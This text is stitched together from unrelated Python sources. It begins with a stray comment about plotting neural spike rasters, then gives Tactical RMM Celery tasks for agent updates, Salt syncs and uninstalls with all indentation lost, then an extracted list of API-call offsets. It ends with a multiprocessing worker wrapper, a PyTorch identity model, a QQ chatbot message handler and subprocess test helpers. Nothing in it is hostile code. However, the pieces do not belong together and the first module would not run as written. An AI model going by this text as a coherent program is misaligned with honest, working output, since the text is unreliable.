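# raster() above runs with its defaults; other mitral-cell pairs or time windows
# can be plotted by passing the corresponding arguments, e.g. (sketch only):
#
#   raster(pair=[1, 3], cluster_width=5, xlim=(1500, 2500))
#
# provided the spike, weight and breath-event files loaded above cover that
# interval.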
import os
import subprocess
from loguru import logger
from time import sleep
import random
import requests
from packaging import version as pyver
from django.conf import settings
from tacticalrmm.celery import app
from agents.models import Agent, AgentOutage
from core.models import CoreSettings
logger.configure(**settings.LOG_CONFIG)
@app.task
def send_agent_update_task(pks, version):
assert isinstance(pks, list)
q = Agent.objects.filter(pk__in=pks)
agents = [i.pk for i in q if pyver.parse(i.version) < pyver.parse(version)]
chunks = (agents[i : i + 30] for i in range(0, len(agents), 30))
for chunk in chunks:
for pk in chunk:
agent = Agent.objects.get(pk=pk)
if agent.operating_system is not None:
if "64bit" in agent.operating_system:
arch = "64"
elif "32bit" in agent.operating_system:
arch = "32"
else:
arch = "64"
url = settings.DL_64 if arch == "64" else settings.DL_32
inno = (
f"winagent-v{version}.exe"
if arch == "64"
else f"winagent-v{version}-x86.exe"
)
r = agent.salt_api_async(
func="win_agent.do_agent_update_v2",
kwargs={
"inno": inno,
"url": url,
},
)
sleep(10)
@app.task
def auto_self_agent_update_task():
core = CoreSettings.objects.first()
if not core.agent_auto_update:
return
q = Agent.objects.all()
agents = [
i.pk
for i in q
if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER)
]
chunks = (agents[i : i + 30] for i in range(0, len(agents), 30))
for chunk in chunks:
for pk in chunk:
agent = Agent.objects.get(pk=pk)
if agent.operating_system is not None:
if "64bit" in agent.operating_system:
arch = "64"
elif "32bit" in agent.operating_system:
arch = "32"
else:
arch = "64"
url = settings.DL_64 if arch == "64" else settings.DL_32
inno = (
f"winagent-v{settings.LATEST_AGENT_VER}.exe"
if arch == "64"
else f"winagent-v{settings.LATEST_AGENT_VER}-x86.exe"
)
r = agent.salt_api_async(
func="win_agent.do_agent_update_v2",
kwargs={
"inno": inno,
"url": url,
},
)
sleep(10)
@app.task
def update_salt_minion_task():
q = Agent.objects.all()
agents = [
i.pk
for i in q
if pyver.parse(i.version) >= pyver.parse("0.11.0")
and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER)
]
chunks = (agents[i : i + 50] for i in range(0, len(agents), 50))
for chunk in chunks:
for pk in chunk:
agent = Agent.objects.get(pk=pk)
r = agent.salt_api_async(func="win_agent.update_salt")
sleep(20)
@app.task
def get_wmi_detail_task(pk):
agent = Agent.objects.get(pk=pk)
r = agent.salt_api_cmd(timeout=30, func="win_agent.system_info")
if r == "timeout" or r == "error":
return "failed"
agent.wmi_detail = r
agent.save(update_fields=["wmi_detail"])
return "ok"
@app.task
def sync_salt_modules_task(pk):
agent = Agent.objects.get(pk=pk)
r = agent.salt_api_cmd(timeout=35, func="saltutil.sync_modules")
# successful sync if new/changed files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]}
# successful sync with no new/changed files: {'return': [{'MINION-15': []}]}
if r == "timeout" or r == "error":
logger.error(f"Unable to sync modules {agent.salt_id}")
return
logger.info(f"Successfully synced salt modules on {agent.hostname}")
return "ok"
@app.task
def batch_sync_modules_task():
# sync modules, split into chunks of 50 agents to not overload salt
agents = Agent.objects.all()
online = [i.salt_id for i in agents if i.status == "online"]
chunks = (online[i : i + 50] for i in range(0, len(online), 50))
for chunk in chunks:
Agent.salt_batch_async(minions=chunk, func="saltutil.sync_modules")
sleep(10)
@app.task
def batch_sysinfo_task():
# update system info using WMI
agents = Agent.objects.all()
online = [
i.salt_id
for i in agents
if not i.not_supported("0.11.0") and i.status == "online"
]
chunks = (online[i : i + 30] for i in range(0, len(online), 30))
for chunk in chunks:
Agent.salt_batch_async(minions=chunk, func="win_agent.local_sys_info")
sleep(10)
@app.task
def uninstall_agent_task(salt_id):
attempts = 0
error = False
while 1:
try:
r = requests.post(
f"http://{settings.SALT_HOST}:8123/run",
json=[
{
"client": "local",
"tgt": salt_id,
"fun": "win_agent.uninstall_agent",
"timeout": 8,
"username": settings.SALT_USERNAME,
"password": settings.SALT_PASSWORD,
"eauth": "<PASSWORD>",
}
],
timeout=10,
)
ret = r.json()["return"][0][salt_id]
except Exception:
attempts += 1
else:
if ret != "ok":
attempts += 1
else:
attempts = 0
if attempts >= 10:
error = True
break
elif attempts == 0:
break
if error:
logger.error(f"{salt_id} uninstall failed")
else:
logger.info(f"{salt_id} was successfully uninstalled")
try:
r = requests.post(
f"http://{settings.SALT_HOST}:8123/run",
json=[
{
"client": "wheel",
"fun": "key.delete",
"match": salt_id,
"username": settings.SALT_USERNAME,
"password": settings.SALT_PASSWORD,
"eauth": "<PASSWORD>",
}
],
timeout=30,
)
except Exception:
logger.error(f"{salt_id} unable to remove salt-key")
return "ok"
@app.task
def agent_outage_email_task(pk):
sleep(random.randint(1, 15))
outage = AgentOutage.objects.get(pk=pk)
outage.send_outage_email()
outage.outage_email_sent = True
outage.save(update_fields=["outage_email_sent"])
@app.task
def agent_recovery_email_task(pk):
sleep(random.randint(1, 15))
outage = AgentOutage.objects.get(pk=pk)
outage.send_recovery_email()
outage.recovery_email_sent = True
outage.save(update_fields=["recovery_email_sent"])
@app.task
def agent_outages_task():
agents = Agent.objects.only("pk")
for agent in agents:
if agent.status == "overdue":
outages = AgentOutage.objects.filter(agent=agent)
if outages and outages.last().is_active:
continue
outage = AgentOutage(agent=agent)
outage.save()
if agent.overdue_email_alert:
agent_outage_email_task.delay(pk=outage.pk)
if agent.overdue_text_alert:
# TODO
pass
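# These are ordinary Celery tasks, so callers queue them instead of calling them
# directly, just as agent_outage_email_task.delay(pk=...) is used above. For
# example (sketch only; the primary keys and version string are placeholders):
#
#   send_agent_update_task.delay(pks=[1, 2, 3], version="1.1.0")
#   update_salt_minion_task.delay()
#   agent_outages_task.delay()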
| [
"random.randint",
"loguru.logger.error",
"loguru.logger.configure",
"agents.models.AgentOutage.objects.get",
"agents.models.Agent.objects.only",
"agents.models.AgentOutage",
"agents.models.Agent.objects.filter",
"packaging.version.parse",
"time.sleep",
"agents.models.Agent.salt_batch_async",
"loguru.logger.info",
"agents.models.AgentOutage.objects.filter",
"agents.models.Agent.objects.all",
"requests.post",
"core.models.CoreSettings.objects.first",
"agents.models.Agent.objects.get"
] | [((301, 340), 'loguru.logger.configure', 'logger.configure', ([], {}), '(**settings.LOG_CONFIG)\n', (317, 340), False, 'from loguru import logger\n'), ((437, 469), 'agents.models.Agent.objects.filter', 'Agent.objects.filter', ([], {'pk__in': 'pks'}), '(pk__in=pks)\n', (457, 469), False, 'from agents.models import Agent, AgentOutage\n'), ((1571, 1599), 'core.models.CoreSettings.objects.first', 'CoreSettings.objects.first', ([], {}), '()\n', (1597, 1599), False, 'from core.models import CoreSettings\n'), ((1659, 1678), 'agents.models.Agent.objects.all', 'Agent.objects.all', ([], {}), '()\n', (1676, 1678), False, 'from agents.models import Agent, AgentOutage\n'), ((2857, 2876), 'agents.models.Agent.objects.all', 'Agent.objects.all', ([], {}), '()\n', (2874, 2876), False, 'from agents.models import Agent, AgentOutage\n'), ((3369, 3393), 'agents.models.Agent.objects.get', 'Agent.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (3386, 3393), False, 'from agents.models import Agent, AgentOutage\n'), ((3669, 3693), 'agents.models.Agent.objects.get', 'Agent.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (3686, 3693), False, 'from agents.models import Agent, AgentOutage\n'), ((4097, 4165), 'loguru.logger.info', 'logger.info', (['f"""Successfully synced salt modules on {agent.hostname}"""'], {}), "(f'Successfully synced salt modules on {agent.hostname}')\n", (4108, 4165), False, 'from loguru import logger\n'), ((4310, 4329), 'agents.models.Agent.objects.all', 'Agent.objects.all', ([], {}), '()\n', (4327, 4329), False, 'from agents.models import Agent, AgentOutage\n'), ((4669, 4688), 'agents.models.Agent.objects.all', 'Agent.objects.all', ([], {}), '()\n', (4686, 4688), False, 'from agents.models import Agent, AgentOutage\n'), ((6818, 6848), 'agents.models.AgentOutage.objects.get', 'AgentOutage.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (6841, 6848), False, 'from agents.models import Agent, AgentOutage\n'), ((7062, 7092), 'agents.models.AgentOutage.objects.get', 'AgentOutage.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (7085, 7092), False, 'from agents.models import Agent, AgentOutage\n'), ((7270, 7294), 'agents.models.Agent.objects.only', 'Agent.objects.only', (['"""pk"""'], {}), "('pk')\n", (7288, 7294), False, 'from agents.models import Agent, AgentOutage\n'), ((1503, 1512), 'time.sleep', 'sleep', (['(10)'], {}), '(10)\n', (1508, 1512), False, 'from time import sleep\n'), ((2796, 2805), 'time.sleep', 'sleep', (['(10)'], {}), '(10)\n', (2801, 2805), False, 'from time import sleep\n'), ((3306, 3315), 'time.sleep', 'sleep', (['(20)'], {}), '(20)\n', (3311, 3315), False, 'from time import sleep\n'), ((4021, 4076), 'loguru.logger.error', 'logger.error', (['f"""Unable to sync modules {agent.salt_id}"""'], {}), "(f'Unable to sync modules {agent.salt_id}')\n", (4033, 4076), False, 'from loguru import logger\n'), ((4497, 4564), 'agents.models.Agent.salt_batch_async', 'Agent.salt_batch_async', ([], {'minions': 'chunk', 'func': '"""saltutil.sync_modules"""'}), "(minions=chunk, func='saltutil.sync_modules')\n", (4519, 4564), False, 'from agents.models import Agent, AgentOutage\n'), ((4573, 4582), 'time.sleep', 'sleep', (['(10)'], {}), '(10)\n', (4578, 4582), False, 'from time import sleep\n'), ((4920, 4990), 'agents.models.Agent.salt_batch_async', 'Agent.salt_batch_async', ([], {'minions': 'chunk', 'func': '"""win_agent.local_sys_info"""'}), "(minions=chunk, func='win_agent.local_sys_info')\n", (4942, 4990), False, 'from agents.models import Agent, AgentOutage\n'), ((4999, 5008), 'time.sleep', 'sleep', 
(['(10)'], {}), '(10)\n', (5004, 5008), False, 'from time import sleep\n'), ((6043, 6086), 'loguru.logger.error', 'logger.error', (['f"""{salt_id} uninstall failed"""'], {}), "(f'{salt_id} uninstall failed')\n", (6055, 6086), False, 'from loguru import logger\n'), ((6105, 6159), 'loguru.logger.info', 'logger.info', (['f"""{salt_id} was successfully uninstalled"""'], {}), "(f'{salt_id} was successfully uninstalled')\n", (6116, 6159), False, 'from loguru import logger\n'), ((6182, 6423), 'requests.post', 'requests.post', (['f"""http://{settings.SALT_HOST}:8123/run"""'], {'json': "[{'client': 'wheel', 'fun': 'key.delete', 'match': salt_id, 'username':\n settings.SALT_USERNAME, 'password': settings.SALT_PASSWORD, 'eauth':\n '<PASSWORD>'}]", 'timeout': '(30)'}), "(f'http://{settings.SALT_HOST}:8123/run', json=[{'client':\n 'wheel', 'fun': 'key.delete', 'match': salt_id, 'username': settings.\n SALT_USERNAME, 'password': settings.SALT_PASSWORD, 'eauth':\n '<PASSWORD>'}], timeout=30)\n", (6195, 6423), False, 'import requests\n'), ((6782, 6803), 'random.randint', 'random.randint', (['(1)', '(15)'], {}), '(1, 15)\n', (6796, 6803), False, 'import random\n'), ((7026, 7047), 'random.randint', 'random.randint', (['(1)', '(15)'], {}), '(1, 15)\n', (7040, 7047), False, 'import random\n'), ((691, 715), 'agents.models.Agent.objects.get', 'Agent.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (708, 715), False, 'from agents.models import Agent, AgentOutage\n'), ((1948, 1972), 'agents.models.Agent.objects.get', 'Agent.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (1965, 1972), False, 'from agents.models import Agent, AgentOutage\n'), ((3206, 3230), 'agents.models.Agent.objects.get', 'Agent.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (3223, 3230), False, 'from agents.models import Agent, AgentOutage\n'), ((5135, 5403), 'requests.post', 'requests.post', (['f"""http://{settings.SALT_HOST}:8123/run"""'], {'json': "[{'client': 'local', 'tgt': salt_id, 'fun': 'win_agent.uninstall_agent',\n 'timeout': 8, 'username': settings.SALT_USERNAME, 'password': settings.\n SALT_PASSWORD, 'eauth': '<PASSWORD>'}]", 'timeout': '(10)'}), "(f'http://{settings.SALT_HOST}:8123/run', json=[{'client':\n 'local', 'tgt': salt_id, 'fun': 'win_agent.uninstall_agent', 'timeout':\n 8, 'username': settings.SALT_USERNAME, 'password': settings.\n SALT_PASSWORD, 'eauth': '<PASSWORD>'}], timeout=10)\n", (5148, 5403), False, 'import requests\n'), ((6657, 6709), 'loguru.logger.error', 'logger.error', (['f"""{salt_id} unable to remove salt-key"""'], {}), "(f'{salt_id} unable to remove salt-key')\n", (6669, 6709), False, 'from loguru import logger\n'), ((7381, 7420), 'agents.models.AgentOutage.objects.filter', 'AgentOutage.objects.filter', ([], {'agent': 'agent'}), '(agent=agent)\n', (7407, 7420), False, 'from agents.models import Agent, AgentOutage\n'), ((7521, 7545), 'agents.models.AgentOutage', 'AgentOutage', ([], {'agent': 'agent'}), '(agent=agent)\n', (7532, 7545), False, 'from agents.models import Agent, AgentOutage\n'), ((503, 525), 'packaging.version.parse', 'pyver.parse', (['i.version'], {}), '(i.version)\n', (514, 525), True, 'from packaging import version as pyver\n'), ((528, 548), 'packaging.version.parse', 'pyver.parse', (['version'], {}), '(version)\n', (539, 548), True, 'from packaging import version as pyver\n'), ((1737, 1759), 'packaging.version.parse', 'pyver.parse', (['i.version'], {}), '(i.version)\n', (1748, 1759), True, 'from packaging import version as pyver\n'), ((1762, 1800), 'packaging.version.parse', 'pyver.parse', 
(['settings.LATEST_AGENT_VER'], {}), '(settings.LATEST_AGENT_VER)\n', (1773, 1800), True, 'from packaging import version as pyver\n'), ((2935, 2957), 'packaging.version.parse', 'pyver.parse', (['i.version'], {}), '(i.version)\n', (2946, 2957), True, 'from packaging import version as pyver\n'), ((2961, 2982), 'packaging.version.parse', 'pyver.parse', (['"""0.11.0"""'], {}), "('0.11.0')\n", (2972, 2982), True, 'from packaging import version as pyver\n'), ((2995, 3018), 'packaging.version.parse', 'pyver.parse', (['i.salt_ver'], {}), '(i.salt_ver)\n', (3006, 3018), True, 'from packaging import version as pyver\n'), ((3021, 3058), 'packaging.version.parse', 'pyver.parse', (['settings.LATEST_SALT_VER'], {}), '(settings.LATEST_SALT_VER)\n', (3032, 3058), True, 'from packaging import version as pyver\n')] |
import collections
import dataclasses
import gc
import multiprocessing
import os
from multiprocessing import Lock, Pipe, Pool, Process, Value
from typing import Any, Callable, Dict, Iterable, List, NewType, Tuple, Union
from .exceptions import (UserFuncRaisedException, WorkerDiedError,
WorkerIsAliveError, WorkerIsDeadError,
WorkerResourceReceivedUnidentifiedMessage)
from .messaging import (BaseMessage, DataPayload, SigClose, StatusRequest,
UserFunc, UserFuncException, WorkerError, WorkerStatus)
from .workerprocess import WorkerProcess
class WorkerResource:
'''Manages a worker process and pipe to it.'''
__slots__ = ['pipe', 'proc', 'verbose']
def __init__(self, target: Callable = None, start: bool = False, args=None, kwargs=None, logging: bool = True, verbose: bool = False, method: str = 'forkserver'):
'''Open Process and pipe to it.
'''
self.verbose = verbose
# set up userfunc
if target is not None:
args = args if args is not None else tuple()
kwargs = kwargs if kwargs is not None else dict()
userfunc = UserFunc(target, *args, **kwargs)
else:
userfunc = None
ctx = multiprocessing.get_context(method)
self.pipe, worker_pipe = Pipe(duplex=True)
self.proc = ctx.Process(
target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging),
)
# start worker if requested
if start:
self.start()
def __repr__(self):
return f'{self.__class__.__name__}[{self.pid}]'
def __enter__(self):
if not self.is_alive():
self.start()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.join()
def __del__(self):
if self.verbose: print(f'{self}.__del__ was called!')
self.terminate(check_alive=False)
############### Main interface methods ###############
def poll(self) -> bool:
'''Check if worker sent anything.
'''
return self.pipe.poll()
def execute(self, data: Any):
'''Send data to worker and blocking return result upon reception.
'''
self.send_data(data)
return self.recv_data()
def recv_data(self) -> Any:
'''Receive raw data from user function.'''
return self.recv().data
def send_data(self, data: Any, **kwargs) -> None:
'''Send any data to worker process to be handled by user function.'''
return self.send_payload(DataPayload(data, **kwargs))
def update_userfunc(self, func: Callable, *args, **kwargs):
'''Send a new UserFunc to worker process.
'''
return self.send_payload(UserFunc(func, *args, **kwargs))
def get_status(self):
'''Blocking request status update from worker.
'''
self.send_payload(StatusRequest())
return self.recv()
############### Pipe interface ###############
def send_payload(self, payload: BaseMessage) -> None:
'''Send a Message (DataPayload or otherwise) to worker process.
'''
if not self.proc.is_alive():
raise WorkerIsDeadError('.send_payload()', self.proc.pid)
if self.verbose: print(f'{self} sending: {payload}')
try:
return self.pipe.send(payload)
except BrokenPipeError:
raise WorkerDiedError(self.proc.pid)
def recv(self) -> DataPayload:
'''Return received DataPayload or raise exception.
'''
try:
payload = self.pipe.recv()
if self.verbose: print(f'{self} received: {payload}')
except (BrokenPipeError, EOFError, ConnectionResetError):
if self.verbose: print('caught one of (BrokenPipeError, EOFError, ConnectionResetError)')
raise WorkerDiedError(self.proc.pid)
# handle incoming data
if isinstance(payload, DataPayload) or isinstance(payload, WorkerStatus):
return payload
elif isinstance(payload, WorkerError):
#self.terminate(check_alive=True)
raise payload.e
elif isinstance(payload, UserFuncException):
raise UserFuncRaisedException(payload.e)
else:
raise WorkerResourceReceivedUnidentifiedMessage()
############### Process interface ###############
@property
def pid(self):
'''Get process id from worker.'''
return self.proc.pid
    def is_alive(self, *args, **kwargs):
        '''Get status of process.'''
        return self.proc.is_alive(*args, **kwargs)
def start(self):
'''Start the process, throws WorkerIsAliveError if already alive.'''
if self.proc.is_alive():
raise WorkerIsAliveError('.start()', self.proc.pid)
return self.proc.start()
def join(self, check_alive=True):
'''Send SigClose() to Worker and then wait for it to die.'''
if check_alive and not self.proc.is_alive():
raise WorkerIsDeadError('.join()', self.proc.pid)
try:
self.pipe.send(SigClose())
except BrokenPipeError:
pass
return self.proc.join()
def terminate(self, check_alive=True):
'''Send terminate signal to worker.'''
if check_alive and not self.proc.is_alive():
raise WorkerIsDeadError('.terminate()', self.proc.pid)
return self.proc.terminate()
#class WorkerPool(list):
#
# ############### Worker Creation ###############
# def is_alive(self):
# return len(self) > 0 and all([w.is_alive() for w in self])
#
# def start(self, num_workers: int, *args, func: Callable = None, **kwargs):
# if self.is_alive():
# raise ValueError('This WorkerPool already has running workers.')
#
# # start each worker
# for ind in range(num_workers):
# self.append(WorkerResource(ind, *args, func=func, **kwargs))
#
# return self
#
# def update_userfunc(self, userfunc: Callable):
# return [w.update_userfunc(userfunc) for w in self]
#
# ############### Low-Level Process Operations ###############
# def join(self):
# [w.join() for w in self]
# self.clear()
#
# def terminate(self):
# [w.terminate() for w in self]
# self.clear()
| [
"multiprocessing.get_context",
"multiprocessing.Pipe"
] | [((1277, 1312), 'multiprocessing.get_context', 'multiprocessing.get_context', (['method'], {}), '(method)\n', (1304, 1312), False, 'import multiprocessing\n'), ((1346, 1363), 'multiprocessing.Pipe', 'Pipe', ([], {'duplex': '(True)'}), '(duplex=True)\n', (1350, 1363), False, 'from multiprocessing import Lock, Pipe, Pool, Process, Value\n')] |
import click
from guniflask_cli import __version__
@click.group()
def cli_version():
pass
@cli_version.command('version')
def main():
"""
Print the version.
"""
Version().run()
class Version:
def run(self):
print(f" guniflask-cli: v{__version__}")
import guniflask
print(f" guniflask: v{guniflask.__version__}")
| [
"click.group"
] | [((55, 68), 'click.group', 'click.group', ([], {}), '()\n', (66, 68), False, 'import click\n')] |
import torch
# the copy model returns the identity;
# it gets its own class so we don't have to change the code that uses the copy model
class CopyEnvModel(torch.nn.Module):
def __init__(self):
super(CopyEnvModel, self).__init__()
def forward(self, input_frame, input_action):
return input_frame, torch.zeros(input_frame.shape[0]).cuda() | [
"torch.zeros"
] | [((317, 350), 'torch.zeros', 'torch.zeros', (['input_frame.shape[0]'], {}), '(input_frame.shape[0])\n', (328, 350), False, 'import torch\n')] |
from nonebot import CommandSession, on_command
from nonebot import on_natural_language, NLPSession, IntentCommand
from ....requests import Request
from ....responses import *
from ....distributor import Distributor
from ....utils import image_url_to_path
from ....paths import PATHS
import os, logging, traceback
# BLACKLIST = [3288849221]
BLACKLIST = []
@on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True)
async def _(session: NLPSession):
return IntentCommand(100.0, 'porter', args={'message': session.msg_text})
@on_command('porter')
async def porter(session: CommandSession):
logging.debug('=========== [MultiBot] Entered nonebot porter ==========')
# 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列
# Resqust打包
request = Request()
request.platform = 'CQ'
request.user_id = str(session.ctx['user_id'])
self_id = str(session.self_id)
self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像']
bot_called = False
if request.user_id == self_id:
logging.debug('=========== [MultiBot] Left nonebot porter ==========')
return
elif request.user_id in BLACKLIST:
logging.debug('=========== [MultiBot] Left nonebot porter ==========')
return
if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']:
        # The bot was @-mentioned
bot_called = True
if 'group_id' in session.ctx.keys():
request.group_id = str(session.ctx['group_id'])
else:
        # Private chat
bot_called = True
for message in session.ctx['message']:
if message['type'] == 'text' and request.msg is None:
text = message['data']['text'].strip()
            # Name-call detection
for name in self_names:
if name in text:
                    # The bot was called by name
bot_called = True
text = text.strip()
while text[:len(name)] == name:
text = text[len(name):]
while text[-len(name):] == name:
text = text[:-len(name)]
for sign in [None, ',', ',', None]:
text = text.strip(sign)
            # Message-segment check
if '请使用' in text and '新版手机QQ' in text:
request.echo = True
request.msg = '【NonebotPorter】不支持的消息段:"%s"' % text
continue
            # Empty-text check
if text != '':
request.msg = text
elif message['type'] == 'image' and request.img is None:
            # Do not download the image yet; it is downloaded when the response is fetched
request.img = message['data']['url']
# request.img = image_url_to_path(message['data']['url'], header='QQBot')
elif message['type'] == 'record' and request.aud is None:
request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file'])
elif message['type'] == 'location':
request.loc = {'longitude': float(message['data']['lon']),
'latitude': float(message['data']['lat'])}
elif message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']:
request.echo = True
request.msg = f"【NonebotPorter】不支持的消息段[{message['type']}]:" \
f"{str(message).replace('CQ:', '$CQ$:')}"
continue
    # Initialize the distributor
distributor = Distributor()
    # Get the Response sequence while downloading the image; if an error occurs, an error message is returned
def get_responses():
if request.img:
request.img = image_url_to_path(request.img, header='QQBot')
response_list = distributor.handle(request=request)
return response_list
    # Used to execute the Response sequence
async def execute(response_list: list):
for response in response_list:
try:
if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg):
msg = response.text
for at_id in response.at_list:
msg += '[CQ:at,qq=%s]' % str(at_id)
                    # Send over-long text in multiple batches
max_length = 2000
while len(msg) > 0:
                        msg_left = msg[max_length:]  # the part of msg beyond max_length
                        msg = msg[:max_length]  # keep only the part of msg within max_length
                        if isinstance(response, ResponseMsg):  # private chat
await session.send(message=msg)
                        else:  # group message
await session.bot.send_group_msg(group_id=response.group_id, message=msg)
                        if msg_left != '':  # there is still leftover text this round
msg = msg_left
else:
msg = ''
elif isinstance(response, ResponseMusic):
await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]')
elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg):
                    # A backslash needs to be added after the drive letter, and double quotes must not be used
img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\')
if isinstance(response, ResponseImg):
await session.send(message=img_msg)
else:
await session.bot.send_group_msg(group_id=response.group_id, message=img_msg)
elif isinstance(response, ResponseCQFunc):
try:
output = await eval('session.bot.%s' % response.func_name)(**response.kwargs)
except AttributeError:
await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name)
except TypeError:
await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs))
except SyntaxError:
await session.send('【NonebotPorter】语法错误')
else:
await execute(distributor.process_output(output=output)) # 递归处理新的Response序列
except:
                # e.g. problems such as a failed send
logging.error(traceback.format_exc())
    # After filtering, hand the Request to the distributor and execute the returned Response sequence
if bot_called:
        # The call condition is met, execute directly
await execute(response_list=get_responses())
elif distributor.use_active(request=request, save=False):
        # The call condition is not met, but an active Session matches, so it can still be executed
await execute(response_list=get_responses())
else:
logging.debug('=========== [MultiBot] Left nonebot porter ==========')
return
    # Refresh and save the latest session info
distributor.refresh_and_save()
logging.debug('=========== [MultiBot] Completed nonebot porter ==========')
| [
"nonebot.on_command",
"os.path.abspath",
"logging.debug",
"nonebot.IntentCommand",
"traceback.format_exc",
"os.path.join",
"nonebot.on_natural_language"
] | [((372, 465), 'nonebot.on_natural_language', 'on_natural_language', ([], {'only_to_me': '(False)', 'only_short_message': '(False)', 'allow_empty_message': '(True)'}), '(only_to_me=False, only_short_message=False,\n allow_empty_message=True)\n', (391, 465), False, 'from nonebot import on_natural_language, NLPSession, IntentCommand\n'), ((582, 602), 'nonebot.on_command', 'on_command', (['"""porter"""'], {}), "('porter')\n", (592, 602), False, 'from nonebot import CommandSession, on_command\n'), ((509, 575), 'nonebot.IntentCommand', 'IntentCommand', (['(100.0)', '"""porter"""'], {'args': "{'message': session.msg_text}"}), "(100.0, 'porter', args={'message': session.msg_text})\n", (522, 575), False, 'from nonebot import on_natural_language, NLPSession, IntentCommand\n'), ((652, 725), 'logging.debug', 'logging.debug', (['"""=========== [MultiBot] Entered nonebot porter =========="""'], {}), "('=========== [MultiBot] Entered nonebot porter ==========')\n", (665, 725), False, 'import os, logging, traceback\n'), ((6755, 6830), 'logging.debug', 'logging.debug', (['"""=========== [MultiBot] Completed nonebot porter =========="""'], {}), "('=========== [MultiBot] Completed nonebot porter ==========')\n", (6768, 6830), False, 'import os, logging, traceback\n'), ((1088, 1158), 'logging.debug', 'logging.debug', (['"""=========== [MultiBot] Left nonebot porter =========="""'], {}), "('=========== [MultiBot] Left nonebot porter ==========')\n", (1101, 1158), False, 'import os, logging, traceback\n'), ((1224, 1294), 'logging.debug', 'logging.debug', (['"""=========== [MultiBot] Left nonebot porter =========="""'], {}), "('=========== [MultiBot] Left nonebot porter ==========')\n", (1237, 1294), False, 'import os, logging, traceback\n'), ((6598, 6668), 'logging.debug', 'logging.debug', (['"""=========== [MultiBot] Left nonebot porter =========="""'], {}), "('=========== [MultiBot] Left nonebot porter ==========')\n", (6611, 6668), False, 'import os, logging, traceback\n'), ((2881, 2953), 'os.path.join', 'os.path.join', (["PATHS['cqhttp']", '"""data"""', '"""voices"""', "message['data']['file']"], {}), "(PATHS['cqhttp'], 'data', 'voices', message['data']['file'])\n", (2893, 2953), False, 'import os, logging, traceback\n'), ((6254, 6276), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (6274, 6276), False, 'import os, logging, traceback\n'), ((5175, 5205), 'os.path.abspath', 'os.path.abspath', (['response.file'], {}), '(response.file)\n', (5190, 5205), False, 'import os, logging, traceback\n')] |
import os
import subprocess
import sys
import tempfile
import threading
import time
here = os.path.abspath(os.path.dirname(__file__))
class TestApp(threading.Thread):
name = None
args = None
stdin = None
daemon = True
def __init__(self):
super(TestApp, self).__init__()
self.exitcode = None
self.process = None
self.tmpfile = None
self.tmpsize = 0
self.response = None
self.stdout, self.stderr = b'', b''
def start(self, name, args):
self.name = name
self.args = args or []
fd, self.tmpfile = tempfile.mkstemp()
os.close(fd)
touch(self.tmpfile)
self.tmpsize = os.path.getsize(self.tmpfile)
self.response = readfile(self.tmpfile)
super(TestApp, self).start()
def run(self):
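        # Run the tests.<name> module as a subprocess with unbuffered output,
        # capture its stdout/stderr, and store the exit code.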
cmd = [sys.executable, '-m', 'tests.' + self.name]
if self.tmpfile:
cmd += ['--callback-file', self.tmpfile]
cmd += self.args
env = os.environ.copy()
env['PYTHONUNBUFFERED'] = '1'
self.process = subprocess.Popen(
cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
universal_newlines=True,
)
try:
self.stdout, self.stderr = self.process.communicate(self.stdin)
finally:
self.exitcode = self.process.wait()
def is_alive(self):
return self.process is not None and self.exitcode is None
def stop(self):
if self.is_alive():
self.process.terminate()
self.join()
if self.tmpfile:
os.unlink(self.tmpfile)
self.tmpfile = None
def wait_for_response(self, timeout=5, interval=0.1):
self.tmpsize = wait_for_change(
self.tmpfile,
last_size=self.tmpsize,
timeout=timeout,
interval=interval,
)
self.response = readfile(self.tmpfile)
def touch(fname, times=None):
with open(fname, 'a'):
os.utime(fname, times)
def readfile(path):
with open(path, 'rb') as fp:
return fp.readlines()
def wait_for_change(path, last_size=0, timeout=5, interval=0.1):
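    # Poll the file size until it differs from last_size, sleeping between
    # checks and raising RuntimeError once the timeout has elapsed.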
start = time.time()
size = os.path.getsize(path)
while size == last_size:
duration = time.time() - start
sleepfor = interval
if timeout is not None: # pragma: no cover
if duration >= timeout:
raise RuntimeError(
'timeout waiting for change to file=%s' % (path,))
sleepfor = min(timeout - duration, sleepfor)
time.sleep(sleepfor)
size = os.path.getsize(path)
return size
| [
"subprocess.Popen",
"os.unlink",
"tempfile.mkstemp",
"os.path.getsize",
"os.path.dirname",
"os.environ.copy",
"time.time",
"time.sleep",
"os.close",
"os.utime"
